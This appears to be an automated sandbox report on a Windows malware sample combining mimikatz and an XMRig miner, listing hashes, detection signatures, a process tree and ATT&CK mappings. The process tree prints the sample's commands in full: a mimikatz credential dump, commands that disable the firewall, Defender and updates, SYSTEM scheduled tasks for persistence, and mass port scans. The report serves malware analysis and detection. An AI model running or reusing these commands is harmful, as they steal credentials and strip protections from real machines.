Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
-
submitted
02/05/2024, 08:59
General
-
Target
2024-05-02_e0ded9f1af9f4b9842974cc39f8715fc_hacktools_icedid_mimikatz.exe
-
Size
8.7MB
-
MD5
e0ded9f1af9f4b9842974cc39f8715fc
-
SHA1
97e859557b7191b43e8255c3d046171f4615ee90
-
SHA256
62c13b572c6a2823ca0deb302e2db8b1bd2d12a10c3fd7dcad11a00b0102d4e4
-
SHA512
b6d097b41d927bb7aba5e946a1dbea73ddc570f65b3ba2f45d412d2c70e988a2fcb1a9869a0cb037628bb64cefc5c48f5d6f88a1d75b0d2554c8321135e3b97d
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (29269) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
-
UPX dump on OEP (original entry point) 41 IoCs
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Sets file execution options in registry 2 TTPs 40 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 37 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\vgpardblp\iphvab.exe"C:\Windows\TEMP\vgpardblp\iphvab.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-02_e0ded9f1af9f4b9842974cc39f8715fc_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-02_e0ded9f1af9f4b9842974cc39f8715fc_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\jhacitgb\tuipnsn.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
-
C:\Windows\jhacitgb\tuipnsn.exeC:\Windows\jhacitgb\tuipnsn.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\jhacitgb\tuipnsn.exeC:\Windows\jhacitgb\tuipnsn.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iavstblbi\tbvbtbbpb\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\iavstblbi\tbvbtbbpb\wpcap.exeC:\Windows\iavstblbi\tbvbtbbpb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iavstblbi\tbvbtbbpb\baiiclnlb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\iavstblbi\tbvbtbbpb\Scant.txt2⤵
-
C:\Windows\iavstblbi\tbvbtbbpb\baiiclnlb.exeC:\Windows\iavstblbi\tbvbtbbpb\baiiclnlb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\iavstblbi\tbvbtbbpb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iavstblbi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\iavstblbi\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\iavstblbi\Corporate\vfshost.exeC:\Windows\iavstblbi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zhackkbla" /ru system /tr "cmd /c C:\Windows\ime\tuipnsn.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zhackkbla" /ru system /tr "cmd /c C:\Windows\ime\tuipnsn.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "itbutsnbj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "itbutsnbj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dqblaezim" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "dqblaezim" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 784 C:\Windows\TEMP\iavstblbi\784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 384 C:\Windows\TEMP\iavstblbi\384.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2244 C:\Windows\TEMP\iavstblbi\2244.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2552 C:\Windows\TEMP\iavstblbi\2552.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2692 C:\Windows\TEMP\iavstblbi\2692.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2724 C:\Windows\TEMP\iavstblbi\2724.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 3128 C:\Windows\TEMP\iavstblbi\3128.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 3848 C:\Windows\TEMP\iavstblbi\3848.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 3940 C:\Windows\TEMP\iavstblbi\3940.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 4000 C:\Windows\TEMP\iavstblbi\4000.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 4088 C:\Windows\TEMP\iavstblbi\4088.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 1704 C:\Windows\TEMP\iavstblbi\1704.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2328 C:\Windows\TEMP\iavstblbi\2328.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 3768 C:\Windows\TEMP\iavstblbi\3768.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2632 C:\Windows\TEMP\iavstblbi\2632.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 4308 C:\Windows\TEMP\iavstblbi\4308.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 4428 C:\Windows\TEMP\iavstblbi\4428.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\iavstblbi\lnahbingb.exeC:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 4020 C:\Windows\TEMP\iavstblbi\4020.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\iavstblbi\tbvbtbbpb\scan.bat2⤵
-
C:\Windows\iavstblbi\tbvbtbbpb\kbvlbvznc.exekbvlbvznc.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\dipzew.exeC:\Windows\SysWOW64\dipzew.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\tuipnsn.exe1⤵
-
C:\Windows\ime\tuipnsn.exeC:\Windows\ime\tuipnsn.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\tuipnsn.exe1⤵
-
C:\Windows\ime\tuipnsn.exeC:\Windows\ime\tuipnsn.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
25.8MB
MD586a75c9d5ed0fdbaa0694cf04fde0862
SHA11c13f1f5c419e18fbf5c2aaf0d1114691f1e1e30
SHA2566c74bc79ed691d7251a76454ff15df3d3d174f22012299952d7ed21380bbbbb5
SHA512c5a57d45bd8f08261d0b3e13bc038033d07b5dff5ab7f604504d3751f83f5c0ac30dbfe5c67f184534befdafbb667a5fb25b38cf01c0e0e1ba05b155335f90aa
-
Filesize
4.2MB
MD5823eeb0f38253aa067e1c4b9457a963b
SHA158c74b6cafd21a59a045908fdb9951022c7b23c9
SHA256edd8978611306ff1835ac896e475d2b13a8e547b6cafb24297ca100fcb567c0d
SHA5126036fbbf3a2ce98493f8db921f374f1cca6bca9e4feac9fc3d472ae1839371814b68468cbc4f487215c7cabbdc773b68fd2fcd5546b417d9bcebc2c44249e7fa
-
Filesize
1.2MB
MD58e5dd4fe77b5440cf3312c3829f9afc4
SHA137f89dd3d0bbca34bfc9745387744cb5e084d9e8
SHA25635e653d13cf91c9ccc7436f5c6223c1b7ec1b3b9ff978b1adf0eb42dd776c9b2
SHA512466f31a1d0caf54d6e989a22712998076dc8a33f45a8b8d9355eaffb3ebf5ab75b67379e0cd8e0035c487715e4ecd96fc79d8a2d682d4f3601bfc326c2a3b67a
-
Filesize
3.9MB
MD5b0085c429a29f5af4ae07303abb8bd72
SHA1caf7b9cd6e60d6f00eea29f182e0c9b89eefed5a
SHA256d83a9ae58310b789f8498d2cbd2657dc40fd33c1d323e5010856bcacdc95cc29
SHA5126729dda7a0950cf38bbc23524aa1f5afa4812d31c912728dbacd0ecd39bc6da032252eee95fc5512f19b5f2cedc87b834843b7ad8032ffd60e587420d9dd7a93
-
Filesize
2.8MB
MD5a6dbae9577f6d11a814e046aad3e1523
SHA12ed6a80023e1ceb344ecca60b0227aed10bab1fe
SHA256924da4f1cd445e9207e66aab89e2af827d8c2722fd6a016b6c9aa607741f7977
SHA51262d492ca94f53a44b05eee18341f397ce7a4d11e10b6126d7ad98f7fbd387e4dcb005f0d7603457255b8a9c7e9a4baffdc6e0a3a9c7cd2e11e3c6f42494d8874
-
Filesize
2.9MB
MD576ae00f6b4e59bdcb703b4ce87a53cbb
SHA1e5be45c2bbce27ee96bd7423c5e01c2a4dfa6f0d
SHA25655447541c289f9f8890d5e9ebc4519163075860bd551780cdb343bbc11c8dffc
SHA512bac48381e03e3ff6214d6a8b0f4b5ccb85c6d6f9dc2c861921738cbcf963fa43392d19017ef6c5068272047f1832841e446fb80fbdb27054d9424cf34358dba9
-
Filesize
7.4MB
MD51efecfb5cf3c8da80c8539ad98f662e4
SHA1f6a32fd498240c4a69d876ff3c1b6bb91a8a4b69
SHA2567ddc319973e6f2afdb452449a73c4b7f21a26e70bb779cadf6a6e6014f3f8912
SHA5129975044763f28d5d62ec27b3162d62b250da620631a204beec98dabe19eb2ac711468429717a93a0bc56db01dcf9e7e706d8cea3f7dda2c061d9d45fdb43799c
-
Filesize
810KB
MD5ac4598786b0c29b6945f0dba4a9fe66a
SHA13525c16ccca4ad5924f3aa8bab000d316cd25b3b
SHA256f105b8484d67004963e734de2c266aec108ed7facad5f7616eb5350908c6b535
SHA5124d57ada88297aef0f9373593e01ffacd7942575b857d51fb5c4786b9c03cd6072e9ce19642caa91f32d3f54a440245be02aa934537b86afc7768bd1455b0257c
-
Filesize
8.7MB
MD5834da20583a58696d7437952216e8e20
SHA1bbabdff216bfd4e8fe7002bcfc624a6571542c41
SHA25620787fc8792da72404dc2260b8c128730e7788b77a86a2b01df935d1bc74996c
SHA5125c8eefbc714a0c7188d40a60a2cb726e526f2454316f22c2f023bc9817e4b489faac7493b4eaa4fb302692af4b2d8f305cc102817dcd774fda667dc40c485eb1
-
Filesize
33.4MB
MD5373f7e00dc1e85b0c2dd015b7eec3019
SHA190b1368e57d77faf117cae356bd08ebe6a4922dc
SHA256a2ac8ed0fd48bdd64ebd460bbd5ba0c68e1120af8c605c376eb0a0ec04ead55e
SHA512a42b192d9ada68be67c8dcb209992316197d54c75bfb788c82351b3cc57123ffd56be6036729a214d1aa9a09fb7072a947984dc6c9f993d65ae19f24541a1468
-
Filesize
2.6MB
MD5a244f7bd855177da523b9f452fc0c33d
SHA1a97fe8e4e2e1c8824ef35ba08dfbc18b31cc49c8
SHA256a05e24d4d460c448d751983049c58b8b06baf015f4577443f8a1223fe60dce6c
SHA512a8d24c71ea038aebe73d0aa5346c35af089ceb2b5b9fe2465648b44d5684f802fdf53bab08bfeb92af09179f8c965493088429e18a87bc40c80e93c9f3e1e9ac
-
Filesize
20.8MB
MD54b827c494b8925cf61163b002308ba6d
SHA1358310e96408dea080f184e5693759a90f547009
SHA2565ea985e9317c18d54441a988b62303efee9751aa08c6ca1bb1281e2e961d1d38
SHA51211b848a7439d1a57c9b0e05e80a5ed997f5dc3f4dafc03a265369492439463c0c9a060eef466f419ebfd30d8beed73f7852a1f5311de687a34e7c3f2d1421877
-
Filesize
8.5MB
MD53972c8622c9ea4d67d6b0b9a5c428f84
SHA17a6e51ff3f3b5ec85e31e5885bd5aab01bed1438
SHA25661952711dde413a9a877ecf6f21621bc8677b56ff2165fea1c8e38fb5564d1a9
SHA5127aa37a44cec2f89cd104ffa2c6ca3130a1557144daf568c534b212f71b69aeca79200a4ae1d69aeff4e80963aacb5c24a8b4a714057d163e1d83304aa6809fb4
-
